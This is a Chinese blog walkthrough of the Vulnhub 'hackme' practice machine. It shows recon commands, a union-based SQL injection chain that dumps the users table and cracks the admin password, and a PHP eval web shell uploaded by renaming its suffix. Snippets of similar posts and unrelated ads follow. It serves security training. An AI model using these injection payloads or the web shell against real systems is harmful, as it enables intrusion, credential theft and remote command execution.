hackme靶机

原创 于 2025-04-01 11:38:34 发布 · 412 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #靶机

1.信息收集

arp-scan -l

2、扫描端口

nmap -T4 -sV -O -p 22,80 192.168.48.142

3、扫描目录

dirsearch -u http://192.168.48.142

192.168.48.142/uploads

192.168.48.142/login.php

漏洞挖掘

sql注入

1、登录主页发现登录页面,而且还可以注册用户

注册用户

单击search

验证sql注入 OSINT' and 1=1#

注入 OSINT' and 1=2#

此处存在字符型(单引号)sql注入

判断字段数

OSINT' order by 3#

OSINT' order by 4#

判断显示位置

-1' union select 1,2,3#

查看当前数据库位置

-1' union select database(),2,3#

查看webapphacking库所有的表

 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

查看users表中所有的列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

查看表中user,password字段数据

-1' union select group_concat(user),group_concat(pasword),3 from users#

将得到密码进行MD5解密

使用superadmin用户登录 密码:Uncrackable

发现文件上传点


制作图片马

<?php @eval($_POST[cmd]); ?>

上传图片马
抓包–修改后缀–发送,可以看出上传成功

访问上传的图片马

http://192.168.48.142/uploads/211.php

测试链接

WISSl83
关注
hackme靶机渗透流程
wxh的博客
10-25 442
查看表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#先确定mac信息,再搭配主机扫描确定靶机的IP地址。依据上面上传phpinfo的步骤,上传一句话木马。第三个为一个上传页面(没找到上传按钮)登录后发现有搜索框 尝试sql注入。上传后回到该页面 尝试访问。连接成功 拿到shell。查看user表中的数据。尝试上传phpinfo。
渗透Vulnhub-hackme靶机
C-HOWE的博客
01-13 949
本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列hackme靶机有一定的了解。
Hackme靶机渗透
m0_50584370的博客
06-01 409
hackme靶机渗透
hackme靶机攻略
qq_68186313的博客
07-29 761
12选择superadmin对应的密码2386acb2cf356944177746fc92523983并解密。8、已经判断完数据库查询表有3列,那么联合查询3列,查出数据库名。10、联合查询通过内置库查询当前数据库使用的表中的列。2、打开御剑,扫描端口,得到hackme靶机IP。9、联合查询通过内置库查询当前数据库使用的表。5、 到这一步发现可以进行sql注入。7、判断数据库当前查询表有几列。11、查询表中我们需要的数据。15、连接木马并进行系统控制。14、上传一句话木马。
hackme 靶机 记录
2401_85232443的博客
02-12 1151
users字段:USER、CURRENT_CONNECTIONS、TOTAL_CONNECTIONS、id、pasword、name、address。破解superadmin用户的密码hash:2386acb2cf356944177746fc92523983。books字段:id、bookname、price。a' or 1=1-- - 单引号字符型注入。数据库:webapphacking。发现开着22、80端口,并访问。有搜索框,可能存在sql注入。表:books,users。发现直接跳转登录页面。
hackme靶机通关攻略
kknifek的博客
09-03 1238
1.先进行端口扫面,扫面和我们同一网段的靶机 2.找出靶机的ip 3.看看他有些什么目录 4.访问这些文件后我们先创建一个账户并登录 5.登录后输入sql语句' or 1=1#获得下图数据 6.再输入1进行抓包 7.用sqlmap验证是否存在sql注入 sqlmap -u "http://172.16.1.197/welcome.php" --data="search=1" -- cookie="PHPSESSID=gnpfr7rt8kbfco8383t
hackme靶机详解
2301_78889930的博客
03-13 343
2.扫描端口 nmap -T4 -sV -O -p- 192.168.95.195。3.扫描目录 dirb http://192.168.95.195。2.启动靶机:点击“开启”按钮,靶机即可启动成功‌。,选择“文件”菜单中的“打开”,然后选择下载的。3.单击search可以进行查看到很多的书名。1.主机发现: arp-scan -l。4.验证漏洞 这里使用sqlmap。直接上传一句话木马 木马被解析。1.目录遍历一下,发现登录框,1.下载并导入靶机:打开。
hackme靶机 教程
weixin_57682301的博客
07-29 173
植入成功后再网址中访问2.php 没有报错证明植入成功,打开蚁剑将网址进行绑定,密码为cmd,创建一个文件,成功证明获得shell权限。扫描ip以及目录找到首页注册登录,进行联合查询找到回显点,使用database()找到数据库名称。将上传的改成jpg格式的一句话木马抓包后将后缀名改回为php即可放行。根据列名user和password找出他的用户名密码。在网址中执行上传的1.php,证明上传成功。根据表名users找到表内的列名。再使用相同的方法将下面的木马植入。根据数据库名找到数据库内的表名。
hackme靶机漏洞解析
m0_59151303的博客
07-29 596
将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径虚拟机设置里修改网络状态为NAT模式点击编辑》虚拟网络编辑器做如下箭头点击,可以看到NAT网卡得到所有信息,包括网络地址分配信息通过上述发现,这里我们直从192.168.204.128开始扫描用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.139直接访问什么也没有2、端口扫描使用kali命令扫描nmap -A 192.168.204.139-p-发现开放22和80端口,包括对应的服务。
Hackme 靶机(通关攻略)
m0_68706634的博客
12-20 632
点击开启靶机去kali终端输入扫出靶机IP192.168.131.170。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8857
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
(全新整理)上市公司绿色全要素生产率数据(2007-2024年)数据格式:面板数据,excel、dta
01-03
1、资源内容地址:https://blog.youkuaiyun.com/2301_79696294/article/details/155912894 2、数据特点:今年全新,手工精心整理,放心引用,数据来自权威,且标注《数据来源》,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 4、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理
HttpClient response null
01-03
先展示下效果 https://pan.quark.cn/s/5061241daffd 在使用Apache HttpClient库发起HTTP请求的过程中,有可能遇到`HttpClient`返回`response`为`null`的现象,这通常暗示着请求未能成功执行或部分资源未能得到妥善处理。 在本文中,我们将详细研究该问题的成因以及应对策略。 我们需要掌握`HttpClient`的运作机制。 `HttpClient`是一个功能强大的Java库,用于发送HTTP请求并接收响应。 它提供了丰富的API,能够处理多种HTTP方法(例如GET、POST等),支持重试机制、连接池管理以及自定义请求头等特性。 然而,一旦`response`对象为`null`,可能涉及以下几种情形:1. **连接故障**:网络连接未成功建立或在请求期间中断。 需要检查网络配置,确保服务器地址准确且可访问。 2. **超时配置**:若请求超时,`HttpClient`可能不会返回`response`。 应检查连接和读取超时设置,并根据实际需求进行适当调整。 3. **服务器故障**:服务器可能返回了错误状态码(如500内部服务器错误),`HttpClient`无法解析该响应。 建议查看服务器日志以获取更多详细信息。 4. **资源管理**:在某些情况下,如果请求的响应实体未被正确关闭,可能导致连接被提前释放,进而使后续的`response`对象为`null`。 在使用`HttpClient 3.x`版本时,必须手动调用`HttpMethod.releaseConnection()`来释放连接。 而在`HttpClient 4.x`及以上版本中,推荐采用`EntityUtils.consumeQuietly(respons...
【计算机视觉】基于YOLOv5/v8/v10的厨房用品与食材检测系统设计:多模型对比与智能UI实现
01-03
内容概要:本文详细介绍了一个基于YOLOv5、YOLOv8和YOLOv10的厨房用品与食材检测系统的全流程开发过程,涵盖从数据集构建、模型训练、多版本性能对比到PyQt5可视化界面开发的完整实现路径。系统支持摄像头实时检测和图片上传检测,并提供了模型优化、功能扩展(如菜谱推荐、新鲜度分析)、边缘部署等进阶方向,帮助开发者将计算机视觉技术落地为实际智能应用。; 适合人群:计算机相关专业本科或研究生,具备Python编程基础和深度学习基础知识,正在进行计算机视觉类毕业设计或项目实践的学生;; 使用场景及目标:①完成“算法+系统”结合的高质量毕设项目;②掌握YOLO系列模型的训练与对比方法;③实现从模型训练到UI交互系统的工程化落地;④探索智能家居场景下的视觉应用拓展; 阅读建议:建议按照“数据准备→模型训练→UI开发→系统优化”的顺序逐步实践,重点关注多模型性能对比与实际部署中的常见问题(如图像格式转换、模型兼容性),并参考提供的代码链接进行调试与功能迭代。
【计算机视觉】基于Qt与百度AI的人脸识别系统开发:跨平台应用中实时检测与比对功能的设计与实现
01-03
内容概要:本文详细介绍了如何使用Qt框架与百度AI的人脸识别API从零开始构建一个跨平台的人脸识别系统。通过手把手教学,涵盖开发环境搭建、Qt界面设计、信号与槽机制应用、百度AI接口调用(包括获取Access Token、人脸检测、属性分析和人脸比对)、摄像头实时采集与处理等核心技术环节。同时提供了错误处理、多线程优化建议以及功能扩展方向,如人脸库管理、活体检测和跨平台部署,帮助开发者打造具备实际应用价值的智能系统。; 适合人群:具备C++基础,熟悉Qt开发框架,希望入门AI应用开发或拓展实战技能的研发人员,尤其适合工作1-3年想提升综合项目能力的程序员。; 使用场景及目标:①学习如何将第三方AI服务集成到桌面应用中;②掌握Qt进行GUI设计、摄像头操作和网络请求的完整流程;③实现人脸识别、属性分析、相似度比对等核心功能;④构建可用于门禁、身份验证等场景的原型系统。; 阅读建议:此资源以实战为导向,建议读者边学边练,严格按照步骤搭建环境并调试代码。重点关注API调用逻辑、信号与槽连接及多线程优化部分,结合提供的代码链接深入理解整体架构,逐步实现从静态图像处理到实时视频流分析的功能演进。
2026最新APP导航下载页PHP网站源码带后台
01-03
非常好看的一款App导航下载推荐页源码,带后台,PHP源码,Thinkphp框架 测试环境:centos7.9,PHP5.6,Mysql5.6 这款源码安装非常便捷干净,后台添加应用及轮播广告也非常方便,网站自适应PC+手机自适应 安装说明: 1.上传源码到根目录,伪静态改为:thinkphp 2.php版本5.6-7.2(本人测的5.6) 3.导入数据库文件,修改数据库路径 Application/Common/Conf/config.php 4.后台路径: 域名/Youni 后台账号:admin 后台密码:123456
340城市房价历史数据(2010-2025.7).xlsx
01-03
## 数据指标说明 参考《经济地理》中李辉(2019)的做法,整理了安居客在全国626个城市的二手房历史数据,并统计整理了各城市的月度和年度房价数据 本次推出的二手房历史房价挂牌数据,更新至2025年7月,包括626个城市的历史月度房价、年度均值、年度中位数、年末房价,对于购房和研究都有一定的参考价值 ## 一、数据介绍 数据名称:中国城市二手房房价历史数据 数据范围:626个城市 时间范围:2010.1-2025.7 样本数量:42522条 数据来源:安居客 更新时间:2025年7月 数据说明:包含历史月度数据、年度数据
电机控制基于滑模观测器的永磁同步电机无位置传感器控制系统建模与仿真:Simulink环境下FOC及SVPWM集成方案设计
最新发布
01-03
内容概要:本文介绍了基于Simulink的永磁同步电机滑模观测器(SMO)无位置传感器控制模型的设计与实现方法,重点阐述了系统的五大核心模块:PMSM本体、坐标变换、PI调节器、滑模观测器和SVPWM调制模块的功能及其协同工作机制。通过构建SMO估算反电动势并结合锁相环(PLL)提取转子位置与速度,实现了无需物理传感器的高精度闭环控制。文章还提供了详细的Simulink分步搭建流程,包括电机参数配置、坐标变换设置、SMO子系统设计、闭环控制连接及参数调试优化策略,并推荐了多个可直接使用的开源模型资源,涵盖基础FOC控制、离散化实现以及全速域切换等进阶应用场景。; 适合人群:具备电机控制理论基础和Simulink仿真经验,从事电机驱动开发的工程师或研究生;熟悉FOC、滑模控制等相关技术的研发人员;; 使用场景及目标:①实现永磁同步电机无位置传感器控制系统仿真;②深入理解滑模观测器在位置与速度估算中的应用原理;③掌握SMO与FOC/SVPWM结合的工程化建模方法;④为后续嵌入式部署提供仿真验证平台; 阅读建议:建议结合提供的现成模型文件进行对照学习,在仿真中逐步调试滑模增益、PI参数和平滑系数,重点关注低速运行稳定性与位置估算精度,必要时引入高频注入法提升全速域性能。
Shevewinyei_SubwayChange_5804_1767244697269.zip
01-03
Shevewinyei_SubwayChange_5804_1767244697269.zip
hackme靶机通关
12-27
### 关于 HackMe 靶机通关攻略 #### 利用 Web 应用程序中的 SQL 注入漏洞获取数据库信息 SQL注入是一种常见的Web应用程序安全漏洞,允许攻击者执行任意SQL查询。对于`hackme2`靶场而言,在存在SQL注入的地方可以...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值